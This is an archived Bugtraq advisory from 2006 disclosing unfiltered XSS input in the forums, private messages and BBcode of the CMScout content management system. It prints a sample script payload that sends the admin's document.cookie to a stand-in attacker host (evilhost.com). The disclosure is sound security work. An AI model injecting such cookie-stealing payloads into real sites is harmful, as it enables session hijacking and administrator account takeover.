Cmscout <= V1.10 multiple XSS attack vectors

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Cmscout <= V1.10 multiple XSS attack vectors
From: zerogue@xxxxxxxxx
Date: 2 May 2006 14:31:49 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Cmscout <= V1.10 multiple XSS attack vectors
Discovered by: Nomenumbra
Date: 5/2/2006
impact:moderate (privilege escalation,possible defacement)

CMScout is a CMS (Content management system) for scouting related groups from 
around the world.
A CMS is a piece of web software that makes it easy for you to install, and 
manage a website.
CMScout includes all the features of other major CMS's that are available (Like 
PHP-Nuke, Mambo, e107, etc.).

Added news items and events are properly filtered for potential XSS input, 
input in the forums and PM's however, is not.
For example, when one would send a pm to the admin like this:

Subject: whatever
Body: 
<script>window.navigate('http://www.evilhost.com/cookiestealer.php?c='+document.cookie)</script>

we could obtain the admin's cookie. The inside of BBcode isn't filtered either. 
This goes for the forums too.

Nomenumbra/[0x4F4C]

Prev by Date: sBlog SQL Injection and Path Disclosure Vulnerability
Next by Date: SF-Users V1.0 XSS injection
Previous by thread: sBlog SQL Injection and Path Disclosure Vulnerability
Next by thread: SF-Users V1.0 XSS injection
Index(es):
- Date
- Thread